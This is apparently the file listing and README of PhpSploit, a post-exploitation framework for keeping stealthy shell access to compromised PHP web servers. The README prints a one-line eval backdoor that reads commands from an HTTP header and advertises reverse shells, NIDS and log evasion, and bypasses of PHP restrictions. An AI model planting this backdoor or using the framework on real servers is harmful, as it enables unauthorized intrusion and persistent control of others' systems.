nil0x42/phpsploit

phpsploit-master
- .codeclimate.yml
- deps
  - phpserialize-1.3
    - phpserialize.py
    - README
    - phpserialize.egg-info
      - top_level.txt
      - dependency_links.txt
      - PKG-INFO
      - SOURCES.txt
      - not-zip-safe
    - setup.py
    - PKG-INFO
    - setup.cfg
  - __init__.py
  - pyparsing-2.1.1
    - robots.txt
    - HowToUsePyparsing.html
    - CHANGES
    - pyparsing.egg-info
      - top_level.txt
      - dependency_links.txt
      - PKG-INFO
      - SOURCES.txt
    - examples
      - pythonGrammarParser.py
      - scanYahoo.py
      - btpyparse.py
      - pymicko.py
      - simpleWiki.py
      - matchPreviousDemo.py
      - SimpleCalc.py
      - dfmparse.py
      - mozillaCalendarParser.py
      - urlExtractorNew.py
      - deltaTime.py
      - 0README.html
      - urlExtractor.py
      - parsePythonValue.py
      - searchParserAppDemo.py
      - apicheck.py
      - ebnf.py
      - pgn.py
      - mozilla.ics
      - partial_gene_match.py
      - parseTabularData.py
      - SingleForm.dfm
      - test_bibparse.py
      - position.py
      - Setup.ini
      - cpp_enum_parser.py
      - idlParse.py
      - nested.py
      - antlr_grammar.py
      - protobuf_parser.py
      - searchparser.py
      - sparser.py
      - datetimeParseActions.py
      - romanNumerals.py
      - htmlStripper.py
      - excelExpr.py
      - parseResultsSumExample.py
      - fourFn.py
      - getNTPserversNew.py
      - makeHTMLTagExample.py
      - select_parser.py
      - chemicalFormulas.py
      - rangeCheck.py
      - tagCapture.py
      - wordsToNum.py
      - LAparser.py
      - invRegex.py
      - greetingInKorean.py
      - eval_arith.py
      - dhcpd_leases_parser.py
      - dictExample.py
      - groupUsingListAllMatches.py
      - dictExample2.py
      - sql2dot.py
      - linenoExample.py
      - getNTPservers.py
      - list1.py
      - holaMundo.py
      - indentedGrammarExample.py
      - macroExpander.py
      - verilogParse.py
      - stackish.py
      - listAllMatches.py
      - __init__.py
      - parseListString.py
      - stateMachine2.py
      - removeLineBreaks.py
      - sexpParser.py
      - simpleSQL.py
      - configParse.py
      - oc.py
      - httpServerLogParser.py
      - withAttribute.py
      - simpleArith.py
      - lucene_grammar.py
      - gen_ctypes.py
      - commasep.py
      - cLibHeader.py
      - builtin_parse_action_demo.py
      - antlr_grammar_tests.py
      - readJson.py
      - shapes.py
      - AcManForm.dfm
      - simpleBool.py
      - greeting.py
      - greetingInGreek.py
      - adventureEngine.py
      - scanExamples.py
      - jsonParser.py
      - TAP.py
      - ebnftest.py
    - LICENSE
    - pyparsingClassDiagram.PNG
    - README
    - setup.py
    - PKG-INFO
    - setup.cfg
    - htmldoc
      - pyparsing.GoToColumn-class.html
      - pyparsing.Word-class.html
      - pyparsing.ParseFatalException-class.html
      - help.html
      - pyparsing.StringEnd-class.html
      - pyparsing.Keyword-class.html
      - pyparsing.NoMatch-class.html
      - pyparsing.CharsNotIn-class.html
      - frames.html
      - pyparsing.Suppress-class.html
      - pyparsing.Or-class.html
      - pyparsing.StringStart-class.html
      - pyparsing.Dict-class.html
      - pyparsing.ParseSyntaxException-class.html
      - pyparsing.ParserElement-class.html
      - pyparsing.CaselessKeyword-class.html
      - pyparsing-module.html
      - pyparsing.Each-class.html
      - module-tree.html
      - pyparsing.Optional-class.html
      - pyparsing.ParseResults-class.html
      - pyparsing.Group-class.html
      - pyparsing.ParseElementEnhance-class.html
      - pyparsing.OneOrMore-class.html
      - pyparsing.White-class.html
      - redirect.html
      - pyparsing.RecursiveGrammarException-class.html
      - pyparsing.OnlyOnce-class.html
      - pyparsing.LineStart-class.html
      - pyparsing.MatchFirst-class.html
      - class-tree.html
      - pyparsing.Regex-class.html
      - pyparsing.Literal-class.html
      - epydoc.css
      - pyparsing.ParseExpression-class.html
      - pyparsing.LineEnd-class.html
      - identifier-index.html
      - toc-pyparsing-module.html
      - pyparsing.Token-class.html
      - pyparsing.QuotedString-class.html
      - pyparsing.NotAny-class.html
      - pyparsing.Combine-class.html
      - pyparsing.TokenConverter-class.html
      - pyparsing.FollowedBy-class.html
      - pyparsing.And-class.html
      - index.html
      - pyparsing.ZeroOrMore-class.html
      - pyparsing.ParseBaseException-class.html
      - pyparsing.Regex.compiledREtype-class.html
      - pyparsing.Empty-class.html
      - pyparsing.Forward-class.html
      - toc-everything.html
      - pyparsing.WordEnd-class.html
      - toc.html
      - pyparsing.ParseException-class.html
      - pyparsing.CaselessLiteral-class.html
      - pyparsing.WordStart-class.html
      - pyparsing.SkipTo-class.html
      - epydoc.js
    - pyparsing.py
    - docs
      - HowToUsePyparsing.html
      - pyparsingClassDiagram.PNG
    - MANIFEST.in
  - shnake-0.5
    - TODO
    - shnake
      - shell.py
      - lexer.py
      - __init__.py
      - parser.py
    - demo
      - demo.py
    - LICENSE
    - CHANGELOG.md
    - README.md
  - PySocks-1.4.2-74-g10fb5b2
    - sockshandler.py
    - LICENSE
    - test
      - sockstest.py
      - socks4server.py
      - test.sh
      - README
      - mocks.conf
      - httpproxy.py
      - mocks
    - setup.py
    - README.md
    - socks.py
- .remarkrc
- src
  - decorators
    - isolate_io_context.py
    - isolate_readline_context.py
    - __init__.py
    - readonly_settings.py
  - utils
    - regex.py
    - path.py
    - __init__.py
    - time.py
  - ui
    - output
      - wrapper.py
      - __init__.py
    - color.py
    - console.py
    - __init__.py
    - input
      - expect.py
      - __init__.py
    - interface.py
  - linebuf.py
  - api
    - php-functions
      - execute.php
      - matchRegexp.php
      - fileAccess.php
      - set_smart_date.php
      - getGroup.php
      - getSize.php
      - mysqli_compat.php
      - dirAccess.php
      - can_change_mtime.php
      - getMTime.php
      - getOwner.php
      - getPerms.php
    - __init__.py
    - server
      - path.py
      - payload.py
      - __init__.py
    - plugin.py
  - metadict.py
  - datatypes
    - Proxy.py
    - PhpCode.py
    - Path.py
    - Code.py
    - Url.py
    - Boolean.py
    - __init__.py
    - ShellCmd.py
    - WebBrowser.py
    - ByteSize.py
    - Interval.py
  - __init__.py
  - core
    - config.py
    - plugins
      - exceptions.py
      - Plugin.py
      - __init__.py
    - tunnel
      - handler.py
      - compat_handler.py
      - exceptions.py
      - connector.py
      - payload.py
      - __init__.py
    - encoding.py
    - __init__.py
    - session
      - history.py
      - compat_session.py
      - __init__.py
      - settings
        EDITOR.py
        REQ_MAX_POST_SIZE.py
        REQ_ZLIB_TRY_LIMIT.py
        PASSKEY.py
        REQ_POST_DATA.py
        REQ_MAX_HEADER_SIZE.py
        BACKDOOR.py
        REQ_INTERVAL.py
        REQ_DEFAULT_METHOD.py
        CACHE_SIZE.py
        PAYLOAD_PREFIX.py
        TARGET.py
        VERBOSITY.py
        REQ_MAX_HEADERS.py
        SAVEPATH.py
        __init__.py
        REQ_HEADER_PAYLOAD.py
        BROWSER.py
        PROXY.py
        TMPPATH.py
      - environment.py
- TODO
- .lgtm.yml
- utils
  - pylint.sh
  - make_release.sh
  - start_phpsploit_connected.sh
- .coveragerc
- .all-contributorsrc
- LICENSE
- test
  - interface
    - tty-colors.sh
    - issue73_show-stacktrace-if-VERBOSITY.sh
    - command-line-options.sh
    - README.md
    - phpsploit-launcher.sh
  - commands
    - env.sh
    - help.sh
    - alias.sh
    - README.md
    - corectl
      - display-http-requests.sh
  - plugins
    - README.md
    - issue74_non-connected-plugin-run-errmsg.sh
  - TODO.md
  - RUN.sh
  - README.md
  - core
    - core.plugins
      - test-plugins
        valid_category-name
        is-valid
        plugin.py
        is-empty
        plugin.py
        cannot-compile
        plugin.py
        plugin-py_not-readable
        plugin.py
        invalid-name.notloaded
        plugin.py
        invalid.category
        notloaded
        plugin.py
        system
        is-in-existing_category
        plugin.py
      - RUN.sh
    - README.md
    - linebuf.sh
  - settings
    - BROWSER.sh
    - README.md
  - unittest
    - x.py
- plugins
  - sql
    - mssql
      - connect.php
      - payload.php
      - setdb.php
      - plugin.py
    - oracle
      - connect.php
      - payload.php
      - plugin.py
    - mysql
      - connect.php
      - payload.php
      - setdb.php
      - plugin.py
  - file_system
    - mkdir
      - parent.php
      - payload.php
      - plugin.py
    - ls
      - payload.php
      - plugin.py
    - pwd
      - plugin.py
    - cat
      - payload.php
      - plugin.py
    - download
      - payload.php
      - plugin.py
    - chmod
      - payload.php
      - plugin.py
    - rmdir
      - payload.php
      - plugin.py
    - rm
      - single.php
      - plugin.py
    - edit
      - reader.php
      - writer.php
      - plugin.py
    - cd
      - payload.php
      - plugin.py
    - touch
      - payload.php
      - plugin.py
    - stat
      - payload.php
      - plugin.py
    - cp
      - payload.php
      - plugin.py
    - upload
      - payload.php
      - plugin.py
  - network
    - portscan
      - scanner.php
      - plugin_args.py
      - ports.json
      - plugin.py
  - active_directory
    - ldap
      - list.php
      - search.php
      - plugin.py
  - system
    - phpinfo
      - html_format.php
      - array_format.php
      - plugin.py
    - whoami
      - plugin.py
    - suidroot
      - payload.php
      - plugin.py
      - backdoor.c
    - run
      - payload.php
      - plugin.py
- .editorconfig
- CHANGELOG.md
- phpsploit
- DISCLAIMER
- CONTRIBUTE
- data
  - img
  - user_agents.lst
  - README
  - tunnel
    - forwarders
      - post.php
      - get.php
    - payload_prefix.php
    - encapsulator.php
    - multipart
      - reader.php
      - starter.php
      - sender.php
    - connector.php
  - config
    - README
    - config
  - logo.ascii
  - messages.lst
  - plugin-sample
    - category_name
      - plugin_example
        plugin.py
- .travis.yml
- README.md
- requirements.txt
- .codecov.yml
- .codacy.yml
- man
  - phpsploit.1
  - man.txt2tags
  - README
  - update-man.sh
  - phpsploit.txt
- .gitignore
- docs
  - _config.yml
- INSTALL.md

PhpSploit: Furtive post-exploitation framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

phpsploit demo

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

Efficient: More than 20 plugins to automate post-exploitation tasks
- Run commands and browse filesystem, bypassing PHP security restrictions
- Upload/Download files between client and target
- Edit remote files through local text editor
- Run SQL console on target system
- Spawn reverse TCP shells
Stealth: The framework is made by paranoids, for paranoids
- Nearly invisible by log analysis and NIDS signature detection
- Safe-mode and common PHP security restrictions bypass
- Communications are hidden in HTTP Headers
- Loaded payloads are obfuscated to bypass NIDS
- http/https/socks4/socks5 Proxy support
Convenient: A robust interface with many crucial features
- Detailed help for any command or option (type help)
- Cross-platform on both the client and the server.
- Powerful interface with completion and multi-command support
- Session saving/loading feature & persistent history
- Multi-request support for large payloads (such as uploads)
- Provides a powerful, highly configurable settings engine
- Each setting, such as user-agent has a polymorphic mode
- Customisable environment variables for plugin interaction
- Provides a complete plugin development API

Supported platforms (as attacker):

GNU/Linux
Mac OS X

Supported platforms (as target):

GNU/Linux
BSD Like
Mac OS X
Windows NT

Contributors

Thanks goes to these people (emoji key):

_nil0x42 💻 🚇 🔌 ⚠️	_shiney-wh 💻 🔌	_{Wannes Rombouts} 💻 🚧	_{Amine Ben Asker} 💻 🚧	_{jose nazario} 📖 🐛	_{Sujit Ghosal} 📝	_Zerdoumi 🐛
_{tristandostaler} 🐛	_{Rohan Tarai} 🐛

This project follows the all-contributors specification. Contributions of any kind welcome!